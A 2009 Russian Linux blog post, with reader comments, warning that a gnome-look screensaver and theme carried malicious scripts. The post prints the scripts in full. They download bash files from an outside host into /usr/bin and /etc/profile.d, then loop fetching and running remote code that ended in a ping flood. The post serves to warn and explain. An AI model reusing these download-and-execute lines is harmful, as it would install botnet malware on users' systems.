Online video hd

Смотреть фильмы бесплатно

Официальный сайт avto4avto 24/7/365

Смотреть видео бесплатно

09.12.09 22:36

hayaoВредоносные скрипты на gnome-look

За последние 2 дня на gnome-look обнаружено уже 2 пакета содержащие вредоносные скрипты
скринсейвер WaterFall и тема оформления Ninja

скрипт:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
#!/bin/sh
cd /usr/bin/
rm Auto.bash
sleep 1
wget http://05748.t35.com/Bots/Auto.bash
chmod 777 Auto.bash
echo -----------------
cd /etc/profile.d/
rm gnome.sh
sleep 1
wget http://05748.t35.com/Bots/gnome.sh
chmod 777 gnome.sh
echo -----------------
clear
exit


содержание скрипта Auto.bash

1
2
3
4
5
6
7
8
9
10
11
while :
do
rm /usr/bin/run.bash
cd /usr/bin/
wget http://05748.t35.com/Bots/index.php
wget http://05748.t35.com/Bots/run.bash
sleep 4
rm index.php
chmod 755 run.bash
command -p /usr/bin/run.bash
done


видимо таким незатейливым способом автор сего безобразия планировал управлять бот-сетью )
в конечном итоге выполнялась команда:

ping -s 65507 www.mmowned.com


Будьте осторожны загружая неизвестное по.



anjolio 09.12.09 23:14 # +5
Простая как 3 копейки идея, только автор площадку для распространения плохую нашёл..
muhas 09.12.09 23:55 # +6
Вот правильно говорят, нечего в рот всякую гадость тащить. Особенно темы в формате deb неизвестна откуда :) а так идея уже давно обкатана. Такого будет больше ибо хомячку все-равно - ему попроси ввести пароль рута что бы рейтинг вконтакте увеличить так и введет без какой либо задней мысли. И никакая защита от таких не спасет :)
viggo 10.12.09 08:04 # +1
Как же хомячку узнать, что в данной теме или скринсейвере есть эта бяка? Не все йогурты одинаково полезны, но есть же "хорошие" для вкусной и здоровой пищи.
xT 10.12.09 08:26 # +1
Не покупать йогурт, кушать кашку)
viggo 10.12.09 12:52 # +0
Я подумал об этом раньше, но не сделал, надо было сразу подстраховаться - я никого в этом топике не минусовал. :)
muhas 10.12.09 10:02 # +2
в скринсейверах обычно нету как минимум башскриптов (хотя хз, не пользовался ими никогда так что про них не скажу), а темы ставятся под пользователям тупо распаковав тему в ~/.themes (дада, там тоже нету никаких скриптов) - а те что не из репов непонятные ставить с правами рута как минимум глупо пока их не исследовал хоть по минимуму (а для этого как известно нужны какие-нить навыки, но хомячек их не имеет иначе был бы уже не хомячком). и если хомяк не может сиед дело сам осознать пусть завет на помощь антивирус и спеца которые настроит ему ОС "под ключ"
hayao 10.12.09 11:57 # +1
в .deb пакетах есть мейнтейнерские скрипты куда запихать можно что угодно да и проблема с рутом решена. а копать пакет, не каждый "хомячок" знает что в него вобще можно заглянуть. антивирус в данном случае тоже не помошник.
в конечном итоге все строится на доверии конкретному ресурсу/человеку.
да, и хомячок пользователь злейший враг безопасности своего ПК.
Jazz 10.12.09 10:05 # +0
По-моему, Вы рано называете пользователей opendesktop хомячками. Этому сайту доверяли :)

А Вы пользуетесь только подписанными пакетами, а если что-то собираете из исходников - проводите предварительный анализ кода?
muhas 10.12.09 10:30 # +2
По-моему, Вы рано называете пользователей opendesktop хомячками. Этому сайту доверяли :)
как можно доверять сайту который не хранит у себя темы а дает линки в другое место? Хотя да, сайту доверять можно а вот тем куда ведут линки не всегда =)

А Вы пользуетесь только подписанными пакетами
нет, просто из офф.репы качаю доверяясь авторам дистра и мейнтейнерам используемых программ
а если что-то собираете из исходников - проводите предварительный анализ кода?
можете назвать мну параноиком, но там где я на это способен - да, но в какой-то момент появляется доверие к автору-мейнтейнеру и я перестаю это делать. а там где неспособен то конечно нет, поэтому там приходится жить на доверии к авторитету программы/автору(ам)/мейнтейнеру/и т.д. но это доверие надо заработать, ибо мимо пролетающим обычно доверие минимально
ZogG 10.12.09 10:35 # +0
ну согласись, что доверия если нет, то прога мало известна, и врядли ты ею будешь пользоваться. Так что ты все правильно выше сказал.
muhas 10.12.09 10:41 # +0
в большинстве случаев именно так.
betruger72 10.12.09 15:13 # +0
muhas, скажи мне как старый кулхацкер и заслуженный арчевод - ты на AURе подобной фигни не видел?
muhas 10.12.09 16:22 # +1
нет. не видел. но посмотрел бы на реакцию арчеводов после нахождения (ибо запихать никто не мешает, ведь никакой модерации нет)
betruger72 10.12.09 17:09 # +1
а реакция будет такая :
1. все возмущены
2. аарон обращается в травмпункт с сотрясением средней тяжести
3. арч становится стабильнее слаки, все пакеты в экстре и ауре проверенные-перепроверенные )))
muhas 10.12.09 17:13 # +0
скорее всего тупо введут премодерацию в ауре =)
а мож просто доп метки какие-нить. хотя почти на всех пакетах в ауре пишется что то типо буть бдительней %username%, возможно ты собрался ставить лажу
chemikadze 10.12.09 19:17 # +0
так задалбывает сидеть и жать N при запросе на редактирование PKGBUILD во время yaourt -Suy --aur, чесслово. Лучше бы премодерацию ввели.
m0nhawk 10.12.09 22:02 # +2
Отруби запрос.
vim /etc/yaourtrc, Luck.
ZogG 10.12.09 10:32 # +0
Из исходников собирают, того чего нет в репах, но очень нужно, что в большинстве случаев уже говорит, вы ставите программу(скрипт или еще чего-то) то что вам надо, значит про нее знаете. И да без анализа ты даже поставить не сможешь, те же зависимости надо знать. А темы и всякие блестяшки никто из исходников не ставит. Вернее ставят, но тот кто реально не понимает не то что в линуксе, а вообще в любой ОС и компах. Вот из-за таких ... будет больше и больше такой фигни, и проверять скоро надо будет и серьезные программы.
Jazz 10.12.09 10:39 # +1
>И да без анализа ты даже поставить не сможешь, те же зависимости надо знать

Вы, похоже, никогда не ставили программу из исходников, а уже говорите что-то об анализе :)

В 99% случаев зависимости описаны разработчиком в INSTALL или README
ZogG 10.12.09 17:00 # +0
конечно нет, потому я сижу на генте и у меня не одним свой ебилд. просто под анализом, я не имею ввиду копание в коде(иногда его так много, да и не все поймешь), а имею ввиду ознакомление с офф.сайтом, описание программы, форумом поддержки, каналом на фриноде, поиске на багзиле генты уже готовых ебилдов. И уже тогда решаю, серьезные люди пишут и поддерживают программу, известна ли она и так далее
Vzlom 10.12.09 01:28 # +1
Вирусом эт не назвать) так что не вирь.... Тупо чел собрал бот сеть) и скарее всего простой скрипткидис, прочитавший мануалы про башии поторчавший на damagelab.org
Username 10.12.09 03:40 # +1
да тут и манов читать не надо.
Username 10.12.09 02:29 # +0
ох уж этот ваш опенсурс
heavyrail 10.12.09 12:07 # +1
Если бы было не open-source, чувак бы ботсеть собрал.
muhas 10.12.09 12:11 # +0
а он и так себе малость собрал, не все же из тех кто попался до сих пор в курсе что у них левые скрипты работают =)
chemikadze 10.12.09 19:27 # +0
Таки вы думаете что он сейчас в состоянии ей воспользоваться?
muhas 11.12.09 09:55 # +0
ну не в полном объеме что хотелось, но думаю немного поюзал хоть для пробы =)
commonD 11.12.09 01:01 # +-3
На самом деле это отвлекающий маневр.

И на текущий момент 83% пользователей deb-based дистрибутивов находятся в крупнейшем linux ботнете. Информация получена, конечно же, из достоверного источника, который захотел остаться неизвестным.
Kraplax 11.12.09 03:46 # +2
Вы забыли теги [sarcasm], кэп! :D
Username 11.12.09 09:42 # +0
инфа сколько процентов?
m0nhawk 11.12.09 18:45 # +0
Определённо там забыта точка.

Посты Комментарии
Последние посты
    Посты Комментарии
    Последние комментарии
      Посты Комментарии
      Изменения
        Посты Комментарии Изменения Черновики Избранное
        Черновики (все)
          Посты Комментарии Изменения Черновики Избранное
          Избранное (всё)
            Посты Комментарии Изменения Черновики Избранное
            Лучшие блоги (все 107)
            Топ пользователей Топ блогов
            Топ пользователей Топ блогов
            Элита (все 2128 из 160 городов)
            Топ пользователей Топ блогов
            В сети: Slip, cubiccat, Shtsh, xT, Elvis, muhas, rakoth

            Новенькие: korovann, blaw, off220, troyane, arts
            welinux.ru

            В хорошем качестве hd видео

            Онлайн видео бесплатно


            Смотреть русское с разговорами видео

            Online video HD

            Видео скачать на телефон

            Русские фильмы бесплатно

            Full HD video online

            Смотреть видео онлайн

            Смотреть HD видео бесплатно

            School смотреть онлайн